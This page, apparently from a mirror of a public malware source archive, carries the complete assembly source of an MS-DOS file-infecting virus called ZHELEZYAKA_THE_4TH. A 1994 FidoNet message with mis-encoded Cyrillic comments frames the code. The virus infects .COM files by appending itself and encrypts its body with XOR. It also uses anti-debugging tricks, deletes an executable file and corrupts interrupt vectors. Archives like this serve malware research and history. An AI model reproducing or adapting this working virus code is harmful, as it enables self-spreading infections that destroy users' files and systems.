Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-27 09:28:25 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.vir01.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

370 lines
7.9 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 1 of 64
; From : MeteO 2:5030/136 Tue 09 Nov 93 08:59
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : ViRii
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : ABC.PVT.HACK (ABC: • æª...)
;* From : Alexei Galich, 123:1000/6.2 (31 Oct 94 13:44)
;* To : All
;* Subj : ViRii
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;<3B>p¨¢¥âáâ¢yî ‚ á, All
;
;‚®â ¢¨pyá ­ ¯¨á «, áâp è­ë©, á ¬ ¯¨á « !
;H ¥§¤ë ¯p¨­¨¬ îâáï á 1:00-8:00
;
;PS: Hy ­¥ §­ î ï ¯®ç¥¬y ®­ â ¡y«îæ¨î ­¥ ¯®­ï«, ¨§¢¨­¨â¥.
;
;--------8<-------------------------------------------------------
;
;
; ZHELEZYAKA_THE_4TH
IDEAL
MODEL TINY
CODESEG
ORG 100H
LOCALS
MAIN_BEGIN: JMP VIRUS_START_O
DB 04H,0,' ZHELEZYAKA_THE_4TH ',0
EXIT_ADDRESS EQU 100H
DOS EQU 21H
VIRUS_SIGNATURE EQU 04H
NUM_FIRST_BYTES EQU 4
ALREADY_INFECT EQU 3
COUNTER_ADDR EQU 510H
FALSE_BYTE_ADDR EQU 104H
COM_WILDCARD EQU (COM_WILDCARD_O-VIRUS_START_O)
EXE_WILDCARD EQU (EXE_WILDCARD_O-VIRUS_START_O)
WRITE_BUFFER EQU (WRITE_BUFFER_O-VIRUS_START_O)
ORIGIN_DIR EQU (WRITE_BUFFER+NUM_FIRST_BYTES)
NEW_DTA EQU (ORIGIN_DIR+65)
COPY_BUFFER EQU (NEW_DTA+256)
FALSE_BYTES EQU (COPY_BUFFER+WRITE_BUFFER)
ORIGIN_BEGIN EQU (ORIGIN_BEGIN_O-VIRUS_START_O)
MAIN_PART_LEN EQU (WRITE_BUFFER)
INFECTED_NUMB EQU (INFECTED_NUMB_O-VIRUS_START_O)
XOR_VALUE EQU (XOR_VALUE_O-VIRUS_START_O)
XOR_VAL0 EQU (XOR_VAL0_O-VIRUS_START_O)
XOR_VAL00 EQU (XOR_VAL00_O-VIRUS_START_O)
XOR_VAL1 EQU (XOR_VAL1_O-VIRUS_START_O)
XOR_VAL2 EQU (XOR_VAL2_O-VIRUS_START_O)
XOR_VAL3 EQU (XOR_VAL3_O-VIRUS_START_O)
XOR_VAL4 EQU (XOR_VAL4_O-VIRUS_START_O)
BEGIN_CODING EQU (BEGIN_CODING_O-VIRUS_START_O)
CONT_CODING EQU (CONT_CODING_O-VIRUS_START_O)
MESSAGE EQU (MESSAGE_O-VIRUS_START_O)
DOT EQU (DOT_O-VIRUS_START_O)
VIRUS_START_O: CALL DETECT_BEGIN_O
XOR_VAL0_O DB 0
DETECT_BEGIN_O: POP SI
SUB SI,3 ; SI -  ç «® ¢¨àãá 
JMP SHORT @@0
XOR_VAL00_O DB 0
@@0: LEA DI,[SI+BEGIN_CODING]
CALL CODE
BEGIN_CODING_O =$
MOV CX,NUM_FIRST_BYTES ; ‹¥ç¨¬
LEA DI,[SI+ORIGIN_BEGIN] ; ä ©«
MOV BX,100H ; ¢
MOVE_LOOP: MOV AH,[DI] ; ¯ ¬ïâ¨
MOV [BX],AH ;
INC DI ;
INC BX ;
LOOP MOVE_LOOP ;
LEA DX,[SI+NEW_DTA] ; ‘â ¢¨¬
MOV AH,1AH ; ᢮î
CALL CHECK ; DTA
MOV AH,47H ;
PUSH SI ; ‡ ¯®¬¨­ ¥¬
LEA SI,[SI+ORIGIN_DIR+1] ; ⥪ã騩
CWD ; ª â «®£
CALL CHECK ;
POP SI ;
FIND_FIRST: LEA DX,[SI+COM_WILDCARD] ; <20>®¨áª ¯¥à¢®£®
XOR CX,CX ; COM ä ©« 
MOV AH,4EH ;
FIND_NEXT: INT DOS ;
JNC @@L1 ;
JMP NO_FILES_FOUND ; …᫨ ­¥â, â® ...
@@L1:
LEA DX,[SI+NEW_DTA+1EH] ; Žâªà®¥¬
MOV AX,3D02H ; íâ®â
CALL CHECK ; ä ©«
MOV BX,AX ; <20>à®ç¨â ¥¬
MOV AH,3FH ; ¯¥à¢ë¥ 4
LEA DX,[SI+ORIGIN_BEGIN] ; ¡ ©â 
MOV DI,DX ; ¨§
MOV CX,NUM_FIRST_BYTES ; í⮣®
INT DOS ; ä ©« 
ADD DI,NUM_FIRST_BYTES-1
CMP [BYTE PTR DI],VIRUS_SIGNATURE
JE @@L2
JMP INFECT_FILE
@@L2:
MOV AH,3EH ; ‡ ªà®¥¬
CALL CHECK ; ä ©«
CONT_SEARCHING: MOV AH,4FH ;  ©â¨
JMP FIND_NEXT ; á«¥¤ãî騩 ä ©«
COM_WILDCARD_O DB '*.COM',0
EXE_WILDCARD_O DB '*.E*',0
MESSAGE_O DB 13,10,'ZHELEZYAKA_THE_4TH WITH YOU FOREVER',13,10,'$'
DOT_O DB '..',0
NO_FILES_FOUND: MOV AH,3BH ; ‘¬¥é ¥¬áï
LEA DX,[SI+DOT] ; ­  ª â «®£
INT DOS ; ¢¢¥àå
JC @@L4 ; ¯®ª 
JMP FIND_FIRST ; ¢®§¬®¦­®
@@L4:
XOR AX,AX ;
MOV ES,AX ; “¢¥«¨ç¨¢ ¥¬
MOV DI,COUNTER_ADDR ; áç¥â稪
MOV AX,[ES:DI] ;
INC AL ;
MOV [ES:DI],AX ; —â®
CMP AL,ALREADY_INFECT ; ¡ã¤¥¬
JG INFECT_MORE ; ¤¥« âì?
CMP AH,ALREADY_INFECT-2 ;
JG BANNER ;
JMP EXECUTE_PROG ;
BANNER: XOR AX,AX ; ‘¡à®á áç¥â稪 
MOV [ES:DI],AX
LEA DX,[SI+MESSAGE] ; ‚뢮¤
MOV AH,9 ; á®®¡é¥­¨ï
CALL CHECK ;
MOV CX,5 ;
CONTINUE_NOISE: MOV DL,7 ; <20>¨áª
MOV AH,2 ;
INT DOS ;
LOOP CONTINUE_NOISE
JMP EXECUTE_PROG
INFECT_MORE: XOR AL,AL ; ‘â¨à ­¨¥ ¯¥à¢®£® .E* ä ©« 
INC AH
MOV [ES:DI],AX
LEA DI,[SI+ORIGIN_DIR] ;
MOV [BYTE PTR DI],'\' ; ‚®ááâ ­ ¢«¨¢ ¥¬
MOV AH,3BH ; áâ àë©
XCHG DX,DI ; ª â «®£
INT DOS ;
LEA DX,[SI+EXE_WILDCARD]
XOR CX,CX
MOV AH,4EH
INT DOS
JC EXECUTE_PROG
LEA DX,[SI+NEW_DTA+1EH]
MOV AH,41H
INT 21H
EXECUTE_PROG: MOV DX,80H ; ‘â ¢¨¬
MOV AH,1AH ; áâ àãî
INT DOS ; DTA
LEA DI,[SI+ORIGIN_DIR] ;
MOV [BYTE PTR DI],'\' ; ‚®ááâ ­ ¢«¨¢ ¥¬
MOV AH,3BH ; áâ àë©
XCHG DX,DI ; ª â «®£
INT DOS ;
MOV AX,DS
MOV ES,AX
MOV BP,100H ;
JMP BP ;
INFECT_FILE:
XOR AL,AL ;
MOV AH,[BYTE PTR SI+XOR_VALUE] ;
@@IFZERO: INC AH ;
JZ @@IFZERO ; <20>®¤£®â ¢«¨¢ ¥¬
MOV [BYTE PTR SI+XOR_VALUE],AH ; ­®¢ë©
MOV [SI+XOR_VAL0],AH ; ª®¤
MOV [SI+XOR_VAL00],AH ;
MOV [SI+XOR_VAL1],AH ;
MOV [SI+XOR_VAL2],AH ;
MOV [SI+XOR_VAL3],AH ;
MOV [SI+XOR_VAL4],AH ;
MOV AX,5700H ; ‡ ¯®¬¨­ ¥¬
CALL CHECK ; ¢à¥¬ï
PUSH CX ; ᮧ¤ ­¨ï
PUSH DX ;
XOR CX,CX ; ˆ¤¥¬
XOR DX,DX ; ­ 
MOV AX,4202H ; ª®­¥æ
CALL CHECK ; ä ©« 
SUB AX,3 ; <20>®¤£®â ¢«¨¢ ¥¬
MOV [BYTE PTR SI+WRITE_BUFFER],0E9H ; ­®¢ë¥
MOV [SI+WRITE_BUFFER+1],AX ; 4 ¡ ©â 
MOV [BYTE PTR SI+WRITE_BUFFER+3],VIRUS_SIGNATURE
MOV CX,MAIN_PART_LEN ;
MOV DI,SI ; Š®¯¨à㥬
COPY_LOOP: MOV AH,[DI] ; ¢¨àãá
MOV [DI+COPY_BUFFER],AH ; ¢
INC DI ; ¡ãää¥à
LOOP COPY_LOOP ;
LEA DI,[SI+COPY_BUFFER+BEGIN_CODING] ; Š®¤¨à㥬
CALL CODER_DECODER ; ¥£®
LEA DI,[SI+COPY_BUFFER+CONT_CODING]
CALL FIRST_CODE
MOV CX,MAIN_PART_LEN ; <20>®¤¡¨à ¥¬
MOV AL,[BYTE PTR FALSE_BYTE_ADDR] ; ¤«¨­ã
ADD AL,[FALSE_BYTES] ;
XOR AH,AH ;
ADD CX,AX ; <20>¨è¥¬
LEA DX,[SI+COPY_BUFFER] ; £« ¢­ãî
MOV AH,40H ; ç áâì
INT DOS ; ¢¨àãá 
XOR CX,CX ; ˆ¤¥¬
XOR DX,DX ; ­ 
MOV AX,4200H ; ­ ç «®
CALL CHECK ; ä ©« 
MOV CX,NUM_FIRST_BYTES ; ˆá¯à ¢«ï¥¬
LEA DX,[SI+WRITE_BUFFER] ; ¯¥à¢ë¥
MOV AH,40H ; ¡ ©âë
INT DOS ; ä ©« 
POP DX ; ‚®ááâ ­ ¢«¨¢ ¥¬
POP CX ; ¢à¥¬ï
MOV AX,5701H ; ᮧ¤ ­¨ï
CALL CHECK ;
MOV AH,3EH ; ‡ ªà뢠¥¬
INT DOS ; ä ©«
CALL CODE_INT
JMP EXECUTE_PROG
ORIGIN_BEGIN_O DB 0CDH,20H,90H,90H
CONT_CODING_O =$
CODER_DECODER: MOV CX,CODER_DECODER-BEGIN_CODING_O-1
MOV AH,[SI+XOR_VALUE]
XOR AL,AL
OUT 21H,AL
CODING_LOOP: IN AL,21H
ADD AL,AH
XOR [DI],AL ; ‘ ¬
INC DI ; ª®¤¨à®¢é¨ª
ADD AL,[FALSE_BYTE_ADDR]
OUT 21H,AL ;
LOOP CODING_LOOP ;
XOR AL,AL
OUT 21H,AL
RET
CHECK: PUSH AX ; <20>«®ª¨à®¢ª  ¯à¥à뢠­¨ï
PUSHF
MOV AL,0FEH
OUT 21H,AL
MOV AH,4FH
POPF
POP AX
INT 21H
PUSH AX
PUSHF
IN AL,21H
CMP AL,0FEH
@@HALT: JNE @@HALT
XOR AL,AL
OUT 21H,AL
POPF
POP AX
RET
CODE_INT: XOR AX,AX ; Š®¤¨à®¢ ­¨¥ INT 0 - 3
MOV ES,AX
MOV CX,12
COD_INT_CON: MOV BX,CX
XOR [BYTE PTR ES:BX],10101010B
LOOP COD_INT_CON
PUSH CS
POP ES
RET
; ------------
FIRST_CODE: MOV CX,FIRST_CODE-CODER_DECODER ; <20>।¢ à¨â¥«ì­ë©
MOV AH,[SI+XOR_VALUE] ; ª®¤¨à®¢é¨ª
JMP SHORT FIRST_COD_LOOP
XOR_VAL1_O DB 0
FIRST_COD_LOOP: XOR [DI],AH
INC DI
JMP SHORT @@2
XOR_VAL2_O DB 0
@@2: LOOP FIRST_COD_LOOP
RET
XOR_VALUE_O DB 0
CODE: PUSH DI
LEA DI,[SI+CONT_CODING]
JMP @@3
XOR_VAL3_O DB 0
@@3: CALL FIRST_CODE
MOV AH,40H
JMP @@4
XOR_VAL4_O DB 0
@@4: CALL CHECK ; —â®¡ë ®¡¬ ­ãâì ¯¥à¥å¢ â稪
CALL CODE_INT
POP DI
JMP SHORT CODER_DECODER
WRITE_BUFFER_O =$
END MAIN_BEGIN
;---------------8<-------------------------------------------------
;
;- ‚ᥠíâ® ¡ë«® ¡ë ¯p¨ª®«ì­®, ª®£¤  ¡ë ­¥ ¡ë«® â ª ¡®«ì­®.
;
; -= iR0NMAN =-
;
;-+- GoldED 2.50.B1016+
; + Origin: Œ…HŽŠ€ - <20>Ž <20><>€‡„HˆŠ !!! (123:1000/6.2)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/p Check for code segment overrides in protected mode
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
View Git Blame Copy Permalink